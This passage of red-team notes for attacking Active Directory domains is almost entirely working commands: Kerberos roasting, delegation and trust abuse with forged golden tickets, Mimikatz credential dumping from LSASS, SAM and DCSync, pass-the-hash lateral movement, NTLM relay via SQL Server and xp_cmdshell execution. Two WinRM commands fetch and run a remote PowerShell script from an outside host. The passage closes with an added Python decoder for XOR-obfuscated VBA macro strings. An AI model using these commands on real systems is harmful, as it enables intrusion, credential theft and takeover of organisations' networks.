proxychains bloodhound-python -c ALL -u 'WEB05$@RED.COM' --hashes 00000000000000000000000000000000:d66f37fd3d677522959e5b4aeecafb78 -d COMPLYEDGE.COM -ns 172.16.76.168 --dns-tcp
```
### SMB Access
```bash
smbmap -H 10.9.20.10 -u kevin -p Passw0rd
```
### WinRM Access
```bash
crackmapexec winrm 10.9.20.10 -u kevin -p 'Password'
```
### SMB Signing
```bash
crackmapexec smb 10.9.20.10
```
### User

- RPCClient
```bash
proxychains rpcclient -U red.com/kevin.gustavo%Passw0rd 10.9.20.10

enumdomusers

queryuser 0x3601
```
- Impacket
```bash
proxychains python3 GetADUsers.py -all -k -no-pass -dc-ip 10.9.20.10 red.com/Administrator
```
### Group

- RPCClient
```bash
enumdomgroups

querygroup 0x200
```

### ASREPRoasting
```bash
python3 impacket/examples/GetNPUsers.py red.com/ -no-pass -dc-ip 10.9.20.10 -usersfile users.txt -format hashcat
```
### Kerberoasting
```bash
python3 impacket/examples/GetUserSPNs.py red.com/kevin:Passw0rd -dc-ip 10.9.20.10 -request
```
### Overpass the Hash/PTK
```bash
python3 impacket/examples/getTGT.py red.com/kevin:Passw0rd
```

### Reset AD Password

- RPCClient
```bash
setuserinfo2 lawrencecohen 23 'Passw0rd'
```
## Domain Reconnaissance on Windows
### GPO

Check GPOs which give a group of users remote access (PsExec, WMI, WinRM, RDP, etc.) to specific hosts.

### Kerberoasting
```powershell
rubeus.exe kerberoast /user:svc_sql /nowrap
```
### ASREPRoasting
```powershell
rubeus.exe asreproast /format:hashcat /user:svc_sql /nowrap
```
### Unconstrained Delegation
```powershell
rubeus.exe monitor /interval:1 /filteruser:reddc$ /nowrap

SpoolSample.exe reddc redsqlw

rubeus.exe ptt /ticket:[ticket]

mimikatz # lsadump::dcsync /domain:red.com /user:RED\administrator
```
### Constrained Delegation
```powershell
rubeus.exe tgtdeleg /nowrap

rubeus.exe s4u /impersonateuser:kevin /user:svc_sql /domain:red.local /msdsspn:time/redwebaw.red.com /altservice:cifs,host,http,winrm /ticket:[ticket] /dc:reddc.red.com /ptt
```
### Resource Based Constrained Delegation
```powershell
ipmo .\powermad.ps1

New-MachineAccount -MachineAccount my -Password $(ConvertTo-SecureString '123' -AsPlainText -Force)

ipmo .\Microsoft.ActiveDirectory.Management.dll

Set-ADComputer red09 -PrincipalsAllowedToDelegateToAccount my$ -Server [DC IP] -Verbose

rubeus.exe s4u /user:my$ /rc4:…… /impersonateuser:administrator /msdsspn:CIFS/red09.red.com /ptt
```
### Internal Web Service

If it is not accessible directly, use SOCKS to reach it.

Look for any computer or user whose name contains "web", "svc", etc., and for functions such as:

- Send a phishing email
- Send a document
- Execute a command
- Ping a host
- DevOps

### SQL Server

- Administrative Logins and Users

sa: instance level

dbo: database level

- Database
```sql
select name from master..sysdatabases;
```
- Tables
```sql
SELECT name FROM master..sysobjects WHERE xtype = 'U';
```
- Column
```sql
select name from syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'users')
```
- User/login
```sql
select user_name();   -- database user name

select system_user;   -- server login name

select * from master..syslogins;
```
- Change Password
```sql
ALTER LOGIN webapp WITH PASSWORD = 'Passw0rd';
```
- SQL Admin
```sql
SELECT IS_SRVROLEMEMBER('sysadmin')

SELECT NAME from master..syslogins where SYSADMIN=1;
```
- Login can be impersonated
```sql
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
```
- Impersonate Sysadmin
```sql
EXECUTE AS LOGIN='sa';

use msdb; EXECUTE AS USER='dbo';
```
- Create a new Sysadmin
```sql
exec ('exec sp_addlogin "zys","Passw0rd"') at [sql01];

exec ('exec sp_addsrvrolemember "zys","sysadmin"') at [sql01];
```

- Check link
```sql
select * from master..sysservers;

exec sp_linkedservers
```
- UNC Path Injection
```bash
# Kali: relay the SQL service account's authentication
proxychains python3 impacket/examples/ntlmrelayx.py --no-http-server -smb2support -t 172.16.221.152 -c

# SQL: force the server to authenticate to the listener
EXEC xp_dirtree '\\192.168.x.y\pwn', 1, 1

# Kali: use the relayed/dumped hash
proxychains python3 impacket/examples/psexec.py -hashes :a7a662ffa4744b6393261529aa5004ad administrator@172.16.y.z

# SQL: command to pass via -c
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC master.dbo.xp_cmdshell 'whoami';
```
- Command Execution

EXEC
```sql
EXEC master.dbo.xp_cmdshell 'whoami';
```
OpenQuery (blind)
```sql
Select * From openquery("reddc", 'select @@servername; exec xp_cmdshell ''ping 192.168.x.y'' ');
```

Check RPC Out
```sql
select srvid,srvname,rpcout from master..sysservers;
```
Enable RPC Out
```sql
exec sp_serveroption 'sql03', 'rpc out', 'true';
```
### Bidirectional Trust Within a Forest

```powershell
mimikatz.exe

lsadump::dcsync /domain:ops.comply.com /user:ops\krbtgt

Get-DomainSID -Domain ops.red.com

Get-DomainSID -Domain red.com

mimikatz.exe "kerberos::golden /user:Administrator /domain:ops.red.com /sid:S-1-5-21-2032401531-514583578-4118054891 /krbtgt:7c7865e6e30e54e8845aad091b0ff447 /sids:S-1-5-21-1135011135-3178090508-3151492220-519 /ptt" "exit"
```

### Abuse Trust Key in a Bidirectional Trust
```powershell
lsadump::dcsync /domain:child.red.com /user:red$

mimikatz kerberos::golden /user:Administrator /domain:child.red.com /sid:S-1-5-21-1675743924-53933031-1918224021 /rc4:51d5b5713a4732047319d02bb9c07c10 /sids:S-1-5-21-3192643952-2658629199-322554960-519 /service:krbtgt /target:red.com /ticket:trust.kirbi

rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/reddc.red.com /dc:reddc.red.com /ptt

ls \\reddc.red.com\c$
```
### Inbound Trust

```powershell
dcsync red.com red\administrator

rubeus.exe asktgt /user:administrator /domain:red.com /aes256:b3d86eabd4895b6cc1ba459490445e0444053c7f24e0ed50cf86d1e1154576c9 /opsec /nowrap

rubeus.exe asktgs /service:krbtgt/blue.com /domain:red.com /dc:reddc.red.com /ticket:[ticket] /nowrap

rubeus.exe asktgs /service:cifs/bluedc.blue.com /domain:bluedc.blue.com /dc:bluedc.blue.com /ticket:[ticket] /nowrap

echo '[ticket]' | base64 -d > red.kirbi

ls \\bluedc.blue.com\c$
```
### Bidirectional Trust Between Forests

```powershell
mimikatz.exe

lsadump::dcsync /domain:red.com /user:RED\krbtgt

Get-DomainSID -Domain red.com

Get-DomainSID -Domain redteam.com

netdom trust redteam.com /d:red.com /enablesidhistory:yes

Get-DomainGroupMember -Identity "Administrators" -Domain redteam.com

mimikatz.exe "kerberos::golden /user:Administrator /domain:redteam.com /sid:S-1-5-21-2032401531-514583578-4118054891 /krbtgt:7c7865e6e30e54e8845aad091b0ff447 /sids:S-1-5-21-1135011135-3178090508-3151492220-1106 /ptt" "exit"
```

## Credentials
### From File
```powershell
C:\program files\xxx\mail.ps1

C:\inetpub\wwwroot\loginform.aspx
```
### DCSync
```
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "lsadump::dcsync /domain:red.com /user:red\Administrator" exit
```
### logonpasswords
```
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" exit
```
### SAM
```
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "token::elevate" "lsadump::sam" exit
```
### Secrets
```
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "token::elevate" "lsadump::secrets" exit
```
### DPAPI
```
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::dpapi" exit
```
### SSH Key

- id_rsa: could be another user's
- authorized_keys
- known_hosts

### Ansible
```
/opt/web.yml
```
### JFrog

### ccache
```
/tmp/krb5cc_alice
```
### keytab

/etc/krb5.keytab

## Remote Access
### PsExec64

- Local SYSTEM
```powershell
paexec.exe -s -i cmd
```
- Remote Login
```powershell
paexec.exe -s \\reddc.red.com powershell
```

### psexec
```bash
python3 impacket/examples/psexec.py -hashes :052e763020c5da81d4085a05e69b0f1b [RED/]pete@192.168.y.z

python3 impacket/examples/psexec.py -k -no-pass da@reddc.red.com cmd
```
### WinRM

```
evil-winrm -i 172.16.y.z -u [red.com\\]jim -p Passw0rd

evil-winrm -i 192.168.y.z -u kevin -H [hash]

invoke-command -computername redwebaw.red.com -scriptblock {cmd /c "powershell -exec bypass -nop iex (new-object net.webclient).downloadstring('http://192.168.x.y/runner64.txt')"}
```

### RDP

- Password Authentication
```
xfreerdp /u:Administrator /p:lab [/d:red.com] /cert:ignore /v:192.168.y.z /dynamic-resolution
```
- PTH
```
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0

xfreerdp /v:192.168.y.z /u:bill /pth:[hash] /d:red.com /dynamic-resolution
```

### SSH
```bash
ssh kevin@192.168.y.z
```
## Pass the Hash

### Mimikatz
```powershell
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:kevin /domain:red.local /ntlm:09238831b1af5edab93c773f56409d96" exit
```
### PsExec
```bash
python3 impacket/examples/psexec.py -hashes :052e763020c5da81d4085a05e69b0f1b [red/]pete@172.16.90.151
```
### WinRM
```powershell
evil-winrm -i 192.168.10.10 -u [red\\]kevin -H 052e763020c5da81d4085a05e69b0f1b
```
### WMI
```bash
python3 impacket/examples/wmiexec.py -k --no-pass [red/]zys@10.9.20.10
```
### SQL
```bash
python3 impacket/examples/mssqlclient.py -p 1433 -windows-auth red/svc_sql@10.10.20.9 -hashes :052e763020c5da81d4085a05e69b0f1b
```
### RDP
```
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0

xfreerdp /v:192.168.10.10 /u:user /pth:[hash] /d:corp1.com /dynamic-resolution
```
or
```powershell
mimikatz.exe

privilege::debug

sekurlsa::pth /user:kevin /domain:red.local /ntlm:2892D26CDF84D7A70E2EB3B9F05C425E /run:"mstsc.exe /restrictedadmin"
```
## PTK and PTT

### Preparation

Pass the ticket or the ccache first.
### PsExec
```
python3 impacket/examples/psexec.py -k -no-pass thomas@dc.red.local cmd
```
### WinRM
```
invoke-command -computername m3webaw.red.local -scriptblock {cmd /c "powershell -ep bypass iex (new-object net.webclient).downloadstring('http://10.10.14.111/run.txt')"}
```
### WMI
```
python3 impacket/examples/wmiexec.py -k --no-pass [red/]alice@10.9.20.10
```
### SQL
```
python3 impacket/examples/mssqlclient.py -p 1433 -windows-auth red/svc_sql@10.10.20.9 -k -no-pass
```
## Pivoting
### Socks

- Metasploit
```bash
use auxiliary/server/socks_proxy

set srvhost 127.0.0.1

run

use post/multi/manage/autoroute

set session 1

run
```
- SSH
```bash
ssh root@192.168.90.101 -D 1080
```
- Chisel
```bash
chisel server -p 8080 --reverse

chisel.exe client 10.10.14.91:8080 R:socks
```
- Exploit a vulnerability through SOCKS
```bash
set lhost 10.10.14.91

set rhost 10.9.15.11

set lport 8443

set proxies socks5:127.0.0.1:1080

set payload ……

set reverseallowproxy true

run
```

### sshuttle
```bash
sshuttle -r bob@172.16.90.197 172.16.90.1/24
```
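The VBA download cradle in the Word Macro section earlier hides its strings as fixed-width decimal chunks, each the character XORed with a one-byte key, which `Nuts()` rebuilds with `Chr(chunk Xor key)`. To see what such a macro would launch, an analyst has to reverse that step; the decoder below is an added example, not part of these notes. The macro fragment, its function names and the encoded sample are constructed, and the key and chunk width are read from the macro text rather than assumed.

```python
"""Triage decoder for the Chr(x Xor key) / Left(s, n) string obfuscation
used by the VBA cradle in these notes. Added example; the macro fragment and
the encoded literal below are constructed for this demonstration."""
import re

# Constructed VBA fragment mirroring the helper-function shape on the page
# (function names, key and encoded literal are made up for this example).
SAMPLE_MACRO = """
Function MyMacro()
    Dim Apples As String
    Apples = "212217208208211156203211206208216"
    Water = Nuts(Apples)
End Function

Function Pears(Beets)
    Pears = Chr(Beets Xor 188)
End Function

Function Strawberries(Grapes)
    Strawberries = Left(Grapes, 3)
End Function

Function Almonds(Jelly)
    Almonds = Right(Jelly, Len(Jelly) - 3)
End Function
"""


def extract_key(vba: str) -> int:
    """Pull the XOR key out of the Chr(<var> Xor <n>) decode expression."""
    m = re.search(r"Chr\(\s*\w+\s+Xor\s+(\d+)\s*\)", vba, re.IGNORECASE)
    if not m:
        raise ValueError("no Chr(x Xor n) decode expression found")
    return int(m.group(1))


def extract_chunk_width(vba: str) -> int:
    """The chunk width is the count passed to Left() in the slicing helper."""
    m = re.search(r"Left\(\s*\w+\s*,\s*(\d+)\s*\)", vba, re.IGNORECASE)
    if not m:
        raise ValueError("no Left(x, n) slicing helper found")
    return int(m.group(1))


def decode_blob(blob: str, key: int, width: int) -> str:
    """Undo the encoding: split into width-digit chunks, XOR each with key."""
    if not blob.isdigit():
        raise ValueError("encoded literal must be decimal digits")
    if len(blob) % width != 0:
        raise ValueError(f"length {len(blob)} is not a multiple of chunk width {width}")
    return "".join(chr(int(blob[i:i + width]) ^ key) for i in range(0, len(blob), width))


def encode_blob(text: str, key: int, width: int) -> str:
    """Forward direction, used only to build and confirm test vectors."""
    chunks = []
    for ch in text:
        value = ord(ch) ^ key
        if value >= 10 ** width:
            raise ValueError(f"{ch!r} does not fit in {width} digits after XOR")
        chunks.append(str(value).zfill(width))
    return "".join(chunks)


def decode_macro_strings(vba: str) -> list:
    """Decode every quoted all-digit literal whose length fits the chunk width."""
    key = extract_key(vba)
    width = extract_chunk_width(vba)
    decoded = []
    for literal in re.findall(r'"(\d+)"', vba):
        if len(literal) >= width and len(literal) % width == 0:
            decoded.append(decode_blob(literal, key, width))
    return decoded


if __name__ == "__main__":
    print(extract_key(SAMPLE_MACRO), extract_chunk_width(SAMPLE_MACRO))
    print(decode_macro_strings(SAMPLE_MACRO))
```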